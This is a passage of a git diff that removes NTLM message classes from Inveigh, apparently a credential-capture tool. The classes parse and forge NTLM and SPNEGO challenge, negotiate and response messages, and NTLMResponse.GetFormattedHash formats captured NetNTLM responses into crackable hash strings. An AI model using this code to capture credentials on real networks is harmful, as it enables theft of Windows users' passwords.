set; } - public ushort TargetNameMaxLen { get; set; } - public uint TargetNameBufferOffset { get; set; } - public byte[] NegotiateFlags { get; set; } - public byte[] ServerChallenge { get; set; } - public UInt64 Reserved { get; set; } - public ushort TargetInfoLen { get; set; } - public ushort TargetInfoMaxLen { get; set; } - public uint TargetInfoBufferOffset { get; set; } - public byte[] Version { get; set; } - public byte[] Payload { get; set; } - - public NTLMChallenge() - { - this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP - this.MessageType = 2; - this.TargetNameLen = 0; - this.TargetNameMaxLen = 0; - this.TargetNameBufferOffset = 56; - this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; - this.ServerChallenge = new byte[16]; - this.Reserved = 0; - this.TargetInfoLen = 0; - this.TargetInfoMaxLen = 0; - this.TargetInfoBufferOffset = 0; - this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; - this.Payload = new byte[0]; - } - - public NTLMChallenge(byte[] data) - { - string signature = Encoding.UTF8.GetString(data); - - if (signature.StartsWith("NTLMSSP")) - { - ReadBytes(data, 0); - } - else - { - SPNEGONegTokenResp token = this.Decode(data); - this.ReadBytes(token.ResponseToken, 0); - } - - } - - public NTLMChallenge(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public NTLMChallenge(byte[] data, bool decode) - { - - if (decode) - { - SPNEGONegTokenResp token = this.Decode(data); - ReadBytes(token.ResponseToken, 0); - } - else - { - ReadBytes(data, 0); - } - - } - - public NTLMChallenge(string challenge, string netBIOSDomainName, string netBIOSComputerName, string dnsDomainName, string dnsComputerName, string dnsTreeName) - { - this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP - this.MessageType = 2; - this.TargetNameLen = 0; - this.TargetNameMaxLen = 0; - this.TargetNameBufferOffset = 56; - this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; - this.ServerChallenge = new byte[16]; - this.Reserved = 0; - this.TargetInfoLen = 0; - this.TargetInfoMaxLen = 0; - this.TargetInfoBufferOffset = 0; - this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; - this.Payload = new byte[0]; - this.ServerChallenge = this.Challenge(challenge); - byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); - NTLMAVPair ntlmAVPair = new NTLMAVPair(); - this.Payload = ntlmAVPair.GetBytes(netBIOSDomainName, netBIOSComputerName, dnsDomainName, dnsComputerName, dnsTreeName, timestamp); - } - - public NTLMChallenge(string challenge, string netBIOSDomainName, string netBIOSComputerName, string dnsDomainName, string dnsComputerName, string dnsTreeName, byte[] timestamp) - { - this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP - this.MessageType = 2; - this.TargetNameLen = 0; - this.TargetNameMaxLen = 0; - this.TargetNameBufferOffset = 56; - this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; - this.ServerChallenge = new byte[16]; - this.Reserved = 0; - this.TargetInfoLen = 0; - this.TargetInfoMaxLen = 0; - this.TargetInfoBufferOffset = 0; - this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; - this.Payload = new byte[0]; - this.ServerChallenge = this.Challenge(challenge); - NTLMAVPair ntlmAVPair = new NTLMAVPair(); - this.Payload = ntlmAVPair.GetBytes(netBIOSDomainName, netBIOSComputerName, dnsDomainName, dnsComputerName, dnsTreeName, timestamp); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.Signature = packetReader.ReadBytes(8); - this.MessageType = packetReader.ReadUInt32(); - this.TargetNameLen = packetReader.ReadUInt16(); - this.TargetNameMaxLen = packetReader.ReadUInt16(); - this.TargetNameBufferOffset = packetReader.ReadUInt32(); - this.NegotiateFlags = packetReader.ReadBytes(4); - this.ServerChallenge = packetReader.ReadBytes(8); - this.Reserved = packetReader.ReadUInt64(); - this.TargetInfoLen = packetReader.ReadUInt16(); - this.TargetInfoMaxLen = packetReader.ReadUInt16(); - this.TargetInfoBufferOffset = packetReader.ReadUInt32(); - this.Version = packetReader.ReadBytes(8); - this.Payload = packetReader.ReadBytes(16); - } - - } - - public byte[] GetBytes(string targetName) - { - byte[] targetNameData = Encoding.Unicode.GetBytes(targetName); - this.TargetNameLen = (ushort)targetNameData.Length; - this.TargetNameMaxLen = this.TargetNameLen; - this.TargetInfoLen = (ushort)this.Payload.Length; - this.TargetInfoMaxLen = this.TargetInfoLen; - this.TargetInfoBufferOffset = (ushort)(targetNameData.Length + 56); - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Signature); - packetWriter.Write(this.MessageType); - packetWriter.Write(this.TargetNameLen); - packetWriter.Write(this.TargetNameMaxLen); - packetWriter.Write(this.TargetNameBufferOffset); - packetWriter.Write(this.NegotiateFlags); - packetWriter.Write(this.ServerChallenge); - packetWriter.Write(this.Reserved); - packetWriter.Write(this.TargetInfoLen); - packetWriter.Write(this.TargetInfoMaxLen); - packetWriter.Write(this.TargetInfoBufferOffset); - packetWriter.Write(this.Version); - packetWriter.Write(targetNameData); - packetWriter.Write(this.Payload); - return memoryStream.ToArray(); - } - - } - - public byte[] Encode(byte[] data) - { - SPNEGONegTokenResp spnegoNegTokenResp = new SPNEGONegTokenResp(); - spnegoNegTokenResp.NegState = 1; - spnegoNegTokenResp.SupportedMech = new byte[10] { 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a }; - byte[] segment1 = ASN1.Encode(0x04, data); - segment1 = ASN1.Encode(0xa2, segment1); - byte[] segment2 = ASN1.Encode(0x06, spnegoNegTokenResp.SupportedMech); - segment2 = ASN1.Encode(0xa1, segment2); - byte[] segment3 = ASN1.Encode(0x0a, new byte[1] { spnegoNegTokenResp.NegState }); - segment3 = ASN1.Encode(0xa0, segment3); - byte[] asn1Data = Utilities.BlockCopy(segment3, segment2, segment1); - asn1Data = ASN1.Encode(0x30, asn1Data); - asn1Data = ASN1.Encode(0xa1, asn1Data); - return asn1Data; - } - - private SPNEGONegTokenResp Decode(byte[] data) - { - - SPNEGONegTokenResp spnegoNegTokenResp = new SPNEGONegTokenResp - { - NegState = ASN1.GetTagBytes(1, data)[0], - SupportedMech = ASN1.GetTagBytes(6, data), - ResponseToken = ASN1.GetTagBytes(4, data) - }; - - return spnegoNegTokenResp; - } - - public byte[] Challenge(string challenge) - { - byte[] challengeData = new byte[8]; - string challengeNew = ""; - - if (String.IsNullOrEmpty(challenge)) - { - string challengeCharacters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; - char[] challengeCharactersArray = new char[8]; - Random random = new Random(); - - for (int i = 0; i < challengeCharactersArray.Length; i++) - { - challengeCharactersArray[i] = challengeCharacters[random.Next(challengeCharacters.Length)]; - } - - string finalString = new String(challengeCharactersArray); - challengeData = Encoding.UTF8.GetBytes(finalString); - challengeNew = (BitConverter.ToString(challengeData)).Replace("-", ""); - } - else - { - challengeNew = challenge; - string challengeMod = challengeNew.Insert(2, "-").Insert(5, "-").Insert(8, "-").Insert(11, "-").Insert(14, "-").Insert(17, "-").Insert(20, "-"); - int i = 0; - - foreach (string character in challengeMod.Split('-')) - { - challengeData[i] = Convert.ToByte(Convert.ToInt16(character, 16)); - i++; - } - - } - - return challengeData; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMHelper.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMHelper.cs deleted file mode 100644 index 7f36060..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMHelper.cs +++ /dev/null @@ -1,94 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.SPNEGO; -using Quiddity.Support; -using System.IO; -using System.Text; - -namespace Quiddity.NTLM -{ - class NTLMHelper - { - public string Signature { get; set; } - public uint MessageType { get; set; } - - public NTLMHelper() - { - - } - public NTLMHelper(byte[]data) - { - string signature = Encoding.UTF8.GetString(data); - - if (signature.StartsWith("NTLMSSP")) - { - ReadBytes(data, 0); - } - else - { - SPNEGONegTokenInit token = this.Decode(data); - this.ReadBytes(token.MechToken, 0); - } - } - - public NTLMHelper(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.Signature = Encoding.UTF8.GetString(packetReader.ReadBytes(8)); - this.MessageType = packetReader.ReadUInt16(); - } - - } - - private SPNEGONegTokenInit Decode(byte[] data) - { - SPNEGONegTokenInit spnegoNegTokenInit = new SPNEGONegTokenInit - { - MechTypes = ASN1.GetTagBytes(6, data), - MechToken = ASN1.GetTagBytes(4, data) - }; - - return spnegoNegTokenInit; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMNegotiate.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMNegotiate.cs deleted file mode 100644 index f5a9353..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMNegotiate.cs +++ /dev/null @@ -1,120 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -using Quiddity.SPNEGO; -using Quiddity.Support; -using System; -using System.IO; - -namespace Quiddity.NTLM -{ - class NTLMNegotiate - { - public byte[] Signature { get; set; } - public uint MessageType { get; set; } - public byte[] NegotiateFlags { get; set; } - public ushort DomainNameLen { get; set; } - public ushort DomainNameMaxLen { get; set; } - public uint DomainNameBufferOffset { get; set; } - public ushort WorkstationLen { get; set; } - public ushort WorkstationMaxLen { get; set; } - public uint WorkstationBufferOffset { get; set; } - public byte[] Version { get; set; } - public byte[] Payload { get; set; } - - public NTLMNegotiate() - { - this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP - this.MessageType = 1; - this.NegotiateFlags = new byte[4] { 0x97, 0x82, 0x08, 0xe2 }; - this.DomainNameLen = 0; - this.DomainNameMaxLen = 0; - this.DomainNameBufferOffset = 0; - this.WorkstationLen = 0; - this.WorkstationMaxLen = 0; - this.WorkstationBufferOffset = 0; - this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; - this.Payload = new byte[8]; - } - - public NTLMNegotiate(byte[] data, bool decode) - { - - if (decode) - { - SPNEGONegTokenInit token = this.Decode(data); - this.ReadBytes(token.MechToken, 0); - } - else - { - ReadBytes(data, 0); - } - - } - - public NTLMNegotiate ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.Signature = packetReader.ReadBytes(8); - this.MessageType = packetReader.ReadUInt16(); - this.DomainNameLen = packetReader.ReadUInt16(); - this.DomainNameMaxLen = packetReader.ReadUInt16(); - this.DomainNameBufferOffset = packetReader.ReadUInt16(); - this.DomainNameLen = packetReader.ReadUInt16(); - this.DomainNameMaxLen = packetReader.ReadUInt16(); - this.DomainNameBufferOffset = packetReader.ReadUInt16(); - this.NegotiateFlags = packetReader.ReadBytes(4); - this.Version = packetReader.ReadBytes(8); - this.Payload = packetReader.ReadBytes(16); - return this; - } - - } - - private SPNEGONegTokenInit Decode(byte[] data) - { - SPNEGONegTokenInit spnegoNegTokenInit = new SPNEGONegTokenInit - { - MechTypes = ASN1.GetTagBytes(6, data), - MechToken = ASN1.GetTagBytes(4, data) - }; - - return spnegoNegTokenInit; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMResponse.cs deleted file mode 100644 index 0790917..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMResponse.cs +++ /dev/null @@ -1,221 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -using Quiddity.SPNEGO; -using Quiddity.Support; -using System; -using System.IO; -using System.Text; - -namespace Quiddity.NTLM -{ - class NTLMResponse - { - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/033d32cc-88f9-4483-9bf2-b273055038ce - public byte[] Signature { get; set; } - public uint MessageType { get; set; } - public ushort LmChallengeResponseLen { get; set; } - public ushort LmChallengeResponseMaxLen { get; set; } - public uint LmChallengeResponseBufferOffset { get; set; } - public ushort NtChallengeResponseLen { get; set; } - public ushort NtChallengeResponseMaxLen { get; set; } - public uint NtChallengeResponseBufferOffset { get; set; } - public ushort DomainNameLen { get; set; } - public ushort DomainNameMaxLen { get; set; } - public uint DomainNameBufferOffset { get; set; } - public ushort UserNameLen { get; set; } - public ushort UserNameMaxLen { get; set; } - public uint UserNameBufferOffset { get; set; } - public ushort WorkstationLen { get; set; } - public ushort WorkstationMaxLen { get; set; } - public uint WorkstationBufferOffset { get; set; } - public ushort EncryptedRandomSessionKeyLen { get; set; } - public ushort EncryptedRandomSessionKeyMaxLen { get; set; } - public uint EncryptedRandomSessionKeyBufferOffset { get; set; } - public byte[] NegotiateFlags { get; set; } - public byte[] Version { get; set; } - public byte[] MIC { get; set; } - public byte[] Payload { get; set; } - - // custom properties - public byte[] DomainName { get; set; } - public byte[] UserName { get; set; } - public byte[] Workstation { get; set; } - public byte[] EncryptedRandomSessionKey { get; set; } - public byte[] NtChallengeResponse { get; set; } - public byte[] LmChallengeResponse { get; set; } - public byte[] Timestamp { get; set; } - - public NTLMResponse() - { - this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP - this.MessageType = 3; - this.LmChallengeResponseLen = 0; - this.LmChallengeResponseMaxLen = 0; - this.LmChallengeResponseBufferOffset = 0; - this.NtChallengeResponseLen = 0; - this.NtChallengeResponseMaxLen = 0; - this.NtChallengeResponseBufferOffset = 0; - this.DomainNameLen = 0; - this.DomainNameMaxLen = 0; - this.DomainNameBufferOffset = 0; - this.UserNameLen = 0; - this.UserNameMaxLen = 0; - this.UserNameBufferOffset = 0; - this.WorkstationLen = 0; - this.WorkstationMaxLen = 0; - this.WorkstationBufferOffset = 0; - this.EncryptedRandomSessionKeyLen = 0; - this.EncryptedRandomSessionKeyMaxLen = 0; - this.EncryptedRandomSessionKeyBufferOffset = 0; - this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; - this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; - this.MIC = new byte[16]; - this.Payload = new byte[0]; - } - - public NTLMResponse(byte[] data) - { - string signature = Encoding.UTF8.GetString(data); - - if (signature.StartsWith("NTLMSSP")) - { - ReadBytes(data); - } - else - { - SPNEGONegTokenResp token = this.Decode(data); - this.ReadBytes(token.ResponseToken); - } - - ParseValues(); - } - - public NTLMResponse(byte[] data, bool decode) - { - - if(decode) - { - SPNEGONegTokenResp token = this.Decode(data); - this.ReadBytes(token.ResponseToken); - } - else - { - ReadBytes(data); - } - - ParseValues(); - } - - public void ReadBytes(byte[] data) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - this.Signature = packetReader.ReadBytes(8); - this.MessageType = packetReader.ReadUInt32(); - this.LmChallengeResponseLen = packetReader.ReadUInt16(); - this.LmChallengeResponseMaxLen = packetReader.ReadUInt16(); - this.LmChallengeResponseBufferOffset = packetReader.ReadUInt32(); - this.NtChallengeResponseLen = packetReader.ReadUInt16(); - this.NtChallengeResponseMaxLen = packetReader.ReadUInt16(); - this.NtChallengeResponseBufferOffset = packetReader.ReadUInt32(); - this.DomainNameLen = packetReader.ReadUInt16(); - this.DomainNameMaxLen = packetReader.ReadUInt16(); - this.DomainNameBufferOffset = packetReader.ReadUInt32(); - this.UserNameLen = packetReader.ReadUInt16(); - this.UserNameMaxLen = packetReader.ReadUInt16(); - this.UserNameBufferOffset = packetReader.ReadUInt32(); - this.WorkstationLen = packetReader.ReadUInt16(); - this.WorkstationMaxLen = packetReader.ReadUInt16(); - this.WorkstationBufferOffset = packetReader.ReadUInt32(); - this.EncryptedRandomSessionKeyLen = packetReader.ReadUInt16(); - this.EncryptedRandomSessionKeyMaxLen = packetReader.ReadUInt16(); - this.EncryptedRandomSessionKeyBufferOffset = packetReader.ReadUInt32(); - this.NegotiateFlags = packetReader.ReadBytes(4); - this.Version = packetReader.ReadBytes(8); - this.MIC = packetReader.ReadBytes(16); - this.Payload = packetReader.ReadBytes(data.Length - 88); - } - - } - - public string GetFormattedHash(string challenge, string user, string domain) - { - string hash = ""; - - if (this.NtChallengeResponse.Length > 24) - { - hash = user + "::" + domain + ":" + challenge + ":" + BitConverter.ToString(this.NtChallengeResponse).Replace("-", "").Insert(32, ":"); - } - else if (this.NtChallengeResponse.Length == 24) - { - hash = user + "::" + domain + ":" + BitConverter.ToString(this.LmChallengeResponse).Replace("-", "") + ":" + BitConverter.ToString(this.NtChallengeResponse).Replace("-", "").Insert(32, ":") + ":" + challenge; - } - - return hash; - } - - private SPNEGONegTokenResp Decode(byte[] data) - { - - SPNEGONegTokenResp spnegoNegTokenResp = new SPNEGONegTokenResp - { - NegState = ASN1.GetTagBytes(10, data)[0], - //SupportedMech = ASN1.GetTagBytes(6, data), - ResponseToken = ASN1.GetTagBytes(4, data), - //MechListMIC = ASN1.GetTagBytes(4, ASN1.GetTagBytes(163, data)) - }; - - return spnegoNegTokenResp; - } - - private void ParseValues() - { - this.DomainName = new byte[this.DomainNameLen]; - Buffer.BlockCopy(this.Payload, (int)(this.DomainNameBufferOffset - 88), this.DomainName, 0, this.DomainNameLen); - this.UserName = new byte[this.UserNameLen]; - Buffer.BlockCopy(this.Payload, (int)(this.UserNameBufferOffset - 88), this.UserName, 0, this.UserNameLen); - this.Workstation = new byte[this.WorkstationLen]; - Buffer.BlockCopy(this.Payload, (int)(this.WorkstationBufferOffset - 88), this.Workstation, 0, this.WorkstationLen); - this.EncryptedRandomSessionKey = new byte[this.EncryptedRandomSessionKeyLen]; - Buffer.BlockCopy(this.Payload, (int)(this.EncryptedRandomSessionKeyBufferOffset - 88), this.EncryptedRandomSessionKey, 0, this.EncryptedRandomSessionKeyLen); - this.LmChallengeResponse = new byte[this.LmChallengeResponseLen]; - Buffer.BlockCopy(this.Payload, (int)(this.LmChallengeResponseBufferOffset - 88), this.LmChallengeResponse, 0, this.LmChallengeResponseLen); - this.NtChallengeResponse = new byte[this.NtChallengeResponseLen]; - Buffer.BlockCopy(this.Payload, (int)(this.NtChallengeResponseBufferOffset - 88), this.NtChallengeResponse, 0, this.NtChallengeResponseLen); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs deleted file mode 100644 index 2e9c678..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs +++ /dev/null @@ -1,128 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Text; -using System.IO; - -namespace Quiddity.NTLM -{ - class NTLMAVPair - { - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/83f5e789-660d-4781-8491-5f8c6641f75e - public ushort AvId { get; set; } - public ushort AvLen { get; set; } - public byte[] Value { get; set; } - - public NTLMAVPair() - { - this.AvId = 0; - this.AvLen = 0; - this.Value = new byte[0]; - } - - public byte[] GetBytes(string netBIOSDomainName, string netBIOSComputerName, string dnsDomainName, string dnsComputerName, string dnsTreeName, byte[] timestamp) - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - - if (!String.IsNullOrEmpty(netBIOSDomainName)) - { - this.AvId = 2; - this.Value = Encoding.Unicode.GetBytes(netBIOSDomainName); - this.AvLen = (ushort)this.Value.Length; - packetWriter.Write(this.AvId); - packetWriter.Write(this.AvLen); - packetWriter.Write(this.Value); - } - - if (!String.IsNullOrEmpty(netBIOSComputerName)) - { - this.AvId = 1; - this.Value = Encoding.Unicode.GetBytes(netBIOSComputerName); - this.AvLen = (ushort)this.Value.Length; - packetWriter.Write(this.AvId); - packetWriter.Write(this.AvLen); - packetWriter.Write(this.Value); - } - - if (!String.IsNullOrEmpty(dnsDomainName)) - { - this.AvId = 4; - this.Value = Encoding.Unicode.GetBytes(dnsDomainName); - this.AvLen = (ushort)this.Value.Length; - packetWriter.Write(this.AvId); - packetWriter.Write(this.AvLen); - packetWriter.Write(this.Value); - } - - if (!String.IsNullOrEmpty(dnsComputerName)) - { - this.AvId = 3; - this.Value = Encoding.Unicode.GetBytes(dnsComputerName); - this.AvLen = (ushort)this.Value.Length; - packetWriter.Write(this.AvId); - packetWriter.Write(this.AvLen); - packetWriter.Write(this.Value); - } - - if (!String.IsNullOrEmpty(dnsTreeName) && !String.Equals(dnsTreeName, netBIOSComputerName)) - { - this.AvId = 5; - this.Value = Encoding.Unicode.GetBytes(dnsTreeName); - this.AvLen = (ushort)this.Value.Length; - packetWriter.Write(this.AvId); - packetWriter.Write(this.AvLen); - packetWriter.Write(this.Value); - } - - this.AvId = 7; - this.Value = timestamp; - this.AvLen = 8; - packetWriter.Write(this.AvId); - packetWriter.Write(this.AvLen); - packetWriter.Write(this.Value); - - this.AvId = 0; - this.AvLen = 0; - packetWriter.Write(this.AvId); - packetWriter.Write(this.AvLen); - - return memoryStream.ToArray(); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs deleted file mode 100644 index 36eba9a..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs +++ /dev/null @@ -1,39 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, 